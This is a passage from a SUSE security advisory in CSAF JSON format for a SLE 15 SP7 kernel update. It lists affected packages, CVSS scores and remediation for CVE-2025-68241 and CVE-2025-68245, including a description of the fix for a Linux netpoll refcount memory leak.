"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
